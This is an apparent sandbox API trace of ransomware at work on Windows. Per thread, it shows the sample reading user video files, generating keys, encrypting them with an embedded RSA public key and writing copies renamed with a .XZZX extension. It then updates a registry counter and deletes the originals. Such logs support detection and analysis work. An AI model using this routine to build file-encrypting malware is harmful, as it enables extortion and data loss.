phProv=0x5582af24*=0x3d1fc40) returned 1 [0130.415] CryptGenKey (in: hProv=0x3d1fc40, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde798) returned 1 [0131.112] CryptExportKey (in: hKey=0x3cde798, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0131.112] CryptExportKey (in: hKey=0x3cde798, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0131.112] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.112] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0131.112] CryptDestroyKey (hKey=0x3cde798) returned 1 [0131.112] CryptReleaseContext (hProv=0x3d1fe60, dwFlags=0x0) returned 0 [0131.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\18ef94cc2373db0bfe65ead427a8bf53.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a0 [0131.113] WriteFile (in: hFile=0x6a0, lpBuffer=0x3d05f58*, nNumberOfBytesToWrite=0x1d67, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3d05f58*, lpNumberOfBytesWritten=0x434e438*=0x1d67, lpOverlapped=0x0) returned 1 [0131.113] SetFilePointer (in: hFile=0x6a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1d67 [0131.113] WriteFile (in: hFile=0x6a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0131.114] SetFilePointer (in: hFile=0x6a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1d6c [0131.114] WriteFile (in: hFile=0x6a0, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x1c, lpOverlapped=0x0) returned 1 [0131.114] SetFilePointer (in: hFile=0x6a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1d88 [0131.114] WriteFile (in: hFile=0x6a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0131.114] SetFilePointer (in: hFile=0x6a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1d8d [0131.114] SetErrorMode (uMode=0x1) returned 0x1 [0131.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0131.114] OutputDebugStringW (lpOutputString="end") [0131.114] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0131.114] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0131.114] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cf6fc0) returned 1 [0131.115] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf6fc0, dwCertEncodingType=0x1, pInfo=0x3d0eb38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0eb68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0eb70*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cde798) returned 1 [0131.115] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.115] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0131.115] CryptEncrypt (in: hKey=0x3cde798, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0131.115] CryptEncrypt (in: hKey=0x3cde798, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf7048*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf7048*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0131.115] WriteFile (in: hFile=0x6a0, lpBuffer=0x3cf7048*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf7048*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0131.116] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0131.116] WriteFile (in: hFile=0x6a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0131.116] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0131.206] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0131.206] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x6a4) returned 0x0 [0131.206] RegQueryValueExW (in: hKey=0x6a4, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xb1, lpcbData=0x434dfdc*=0x4) returned 0x0 [0131.206] RegCloseKey (hKey=0x6a4) returned 0x0 [0131.206] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x6a4) returned 0x0 [0131.206] RegSetValueExW (in: hKey=0x6a4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xb2, cbData=0x4 | out: lpData=0x434dfec*=0xb2) returned 0x0 [0131.206] RegCloseKey (hKey=0x6a4) returned 0x0 [0131.206] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.206] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.207] CloseHandle (hObject=0x6a0) returned 1 [0131.208] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0131.208] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0131.208] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\bAFZ2xGuKI.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\bafz2xguki.swf")) returned 1 [0131.209] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\bAFZ2xGuKI.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\bafz2xguki.swf")) returned 0 Thread: id = 441 os_tid = 0xa0c [0130.594] lstrcpyA (in: lpString1=0x469fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0130.594] lstrcpyW (in: lpString1=0x469f460, lpString2="ibE0v-Egfbu047ynw.swf" | out: lpString1="ibE0v-Egfbu047ynw.swf") returned="ibE0v-Egfbu047ynw.swf" [0130.594] lstrcpyW (in: lpString1=0x469e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0130.594] SetErrorMode (uMode=0x1) returned 0x1 [0130.594] lstrcpyW (in: lpString1=0x469f860, lpString2="ibE0v-Egfbu047ynw.swf" | out: lpString1="ibE0v-Egfbu047ynw.swf") returned="ibE0v-Egfbu047ynw.swf" [0130.594] CoCreateGuid (in: pguid=0x469e440 | out: pguid=0x469e440*(Data1=0xe701f4a5, Data2=0x93cc, Data3=0x469b, Data4=([0]=0x90, [1]=0xd8, [2]=0xaa, [3]=0x6b, [4]=0xc2, [5]=0x4f, [6]=0x9d, [7]=0x27))) returned 0x0 [0130.594] wsprintfW (in: param_1=0x469ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\ibE0v-Egfbu047ynw.swf") returned 101 [0130.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x469fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0130.594] wsprintfW (in: param_1=0x469e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\3509B27C28C34484E701F4A52D2D28CC.XZZX") returned 117 [0130.594] StrStrW (lpFirst="ibE0v-Egfbu047ynw.swf", lpSrch="XZZX") returned 0x0 [0130.594] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\ibE0v-Egfbu047ynw.swf", dwFileAttributes=0x20) returned 1 [0130.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\ibE0v-Egfbu047ynw.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\ibe0v-egfbu047ynw.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x69c [0130.594] ReadFile (in: hFile=0x69c, lpBuffer=0x43652b0, nNumberOfBytesToRead=0x2b7c, lpNumberOfBytesRead=0x469e418, lpOverlapped=0x0 | out: lpBuffer=0x43652b0*, lpNumberOfBytesRead=0x469e418*=0x2b7c, lpOverlapped=0x0) returned 1 [0130.595] CloseHandle (hObject=0x69c) returned 1 [0130.595] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x46a0000 [0130.596] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x46b0000 [0130.596] SetErrorMode (uMode=0x1) returned 0x1 [0130.596] lstrcpyW (in: lpString1=0x469e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0130.596] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1fcc8) returned 1 [0130.598] CryptGenKey (in: hProv=0x3d1fcc8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde818) returned 1 [0131.035] CryptExportKey (in: hKey=0x3cde818, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x469e41c | out: pbData=0x0*, pdwDataLen=0x469e41c*=0x94) returned 1 [0131.035] CryptExportKey (in: hKey=0x3cde818, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x46b0000, pdwDataLen=0x469e41c | out: pbData=0x46b0000*, pdwDataLen=0x469e41c*=0x94) returned 1 [0131.036] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.036] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0131.036] CryptDestroyKey (hKey=0x3cde818) returned 1 [0131.036] CryptReleaseContext (hProv=0x3d1fe60, dwFlags=0x0) returned 0 [0131.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\3509B27C28C34484E701F4A52D2D28CC.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\3509b27c28c34484e701f4a52d2d28cc.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6ac [0131.037] WriteFile (in: hFile=0x6ac, lpBuffer=0x43652b0*, nNumberOfBytesToWrite=0x2b7c, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x43652b0*, lpNumberOfBytesWritten=0x469e438*=0x2b7c, lpOverlapped=0x0) returned 1 [0131.037] SetFilePointer (in: hFile=0x6ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b7c [0131.037] WriteFile (in: hFile=0x6ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0131.037] SetFilePointer (in: hFile=0x6ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b81 [0131.037] WriteFile (in: hFile=0x6ac, lpBuffer=0x469f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x469f860*, lpNumberOfBytesWritten=0x469e438*=0x2a, lpOverlapped=0x0) returned 1 [0131.037] SetFilePointer (in: hFile=0x6ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2bab [0131.037] WriteFile (in: hFile=0x6ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0131.038] SetFilePointer (in: hFile=0x6ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2bb0 [0131.038] SetErrorMode (uMode=0x1) returned 0x1 [0131.038] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0131.038] OutputDebugStringW (lpOutputString="end") [0131.038] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Õi\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x469dbf4, pcbBinary=0x469d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x469dbf4, pcbBinary=0x469d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0131.038] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x469dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x469d3dc, pcbStructInfo=0x469d3d8 | out: pvStructInfo=0x469d3dc, pcbStructInfo=0x469d3d8) returned 1 [0131.038] CryptAcquireContextW (in: phProv=0x469d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x469d3e4*=0x3d1fee8) returned 1 [0131.038] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1fee8, dwCertEncodingType=0x1, pInfo=0x3d0ecd8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0ed08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0ed10*, PublicKey.cUnusedBits=0x0), phKey=0x469d3ec | out: phKey=0x469d3ec*=0x3cde818) returned 1 [0131.038] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.039] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0131.039] CryptEncrypt (in: hKey=0x3cde818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x469d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x469d3f0*=0x80) returned 1 [0131.039] CryptEncrypt (in: hKey=0x3cde818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf6f38*, pdwDataLen=0x469d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf6f38*, pdwDataLen=0x469d3e8*=0x80) returned 1 [0131.039] WriteFile (in: hFile=0x6ac, lpBuffer=0x3cf6f38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf6f38*, lpNumberOfBytesWritten=0x469e438*=0x80, lpOverlapped=0x0) returned 1 [0131.039] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0131.039] WriteFile (in: hFile=0x6ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0131.039] GetUserNameW (in: lpBuffer=0x469e1f8, pcbBuffer=0x469dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x469dfe0) returned 1 [0131.040] wsprintfW (in: param_1=0x469dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0131.040] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x469dfe4 | out: phkResult=0x469dfe4*=0x6b0) returned 0x0 [0131.040] RegQueryValueExW (in: hKey=0x6b0, lpValueName="E1010314", lpReserved=0x0, lpType=0x469dfd8, lpData=0x469dfec, lpcbData=0x469dfdc*=0x4 | out: lpType=0x469dfd8*=0x4, lpData=0x469dfec*=0xb0, lpcbData=0x469dfdc*=0x4) returned 0x0 [0131.040] RegCloseKey (hKey=0x6b0) returned 0x0 [0131.040] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x469dfe8 | out: phkResult=0x469dfe8*=0x6b0) returned 0x0 [0131.040] RegSetValueExW (in: hKey=0x6b0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x469dfec*=0xb1, cbData=0x4 | out: lpData=0x469dfec*=0xb1) returned 0x0 [0131.040] RegCloseKey (hKey=0x6b0) returned 0x0 [0131.040] VirtualFree (lpAddress=0x46a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.040] VirtualFree (lpAddress=0x46b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.041] CloseHandle (hObject=0x6ac) returned 1 [0131.042] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0131.042] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0131.042] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\ibE0v-Egfbu047ynw.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\ibe0v-egfbu047ynw.swf")) returned 1 [0131.043] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\ibE0v-Egfbu047ynw.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\ibe0v-egfbu047ynw.swf")) returned 0 Thread: id = 442 os_tid = 0xa14 [0130.812] lstrcpyA (in: lpString1=0x47ffc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0130.812] lstrcpyW (in: lpString1=0x47ff460, lpString2="MI1L.flv" | out: lpString1="MI1L.flv") returned="MI1L.flv" [0130.812] lstrcpyW (in: lpString1=0x47fe860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0130.812] SetErrorMode (uMode=0x1) returned 0x1 [0130.812] lstrcpyW (in: lpString1=0x47ff860, lpString2="MI1L.flv" | out: lpString1="MI1L.flv") returned="MI1L.flv" [0130.812] CoCreateGuid (in: pguid=0x47fe440 | out: pguid=0x47fe440*(Data1=0x9df89f94, Data2=0x5b22, Data3=0x495e, Data4=([0]=0xa1, [1]=0x63, [2]=0xf1, [3]=0xc7, [4]=0x99, [5]=0xf8, [6]=0xf3, [7]=0x6d))) returned 0x0 [0130.812] wsprintfW (in: param_1=0x47fec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\MI1L.flv") returned 88 [0130.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x47ffee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0130.813] wsprintfW (in: param_1=0x47fe450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 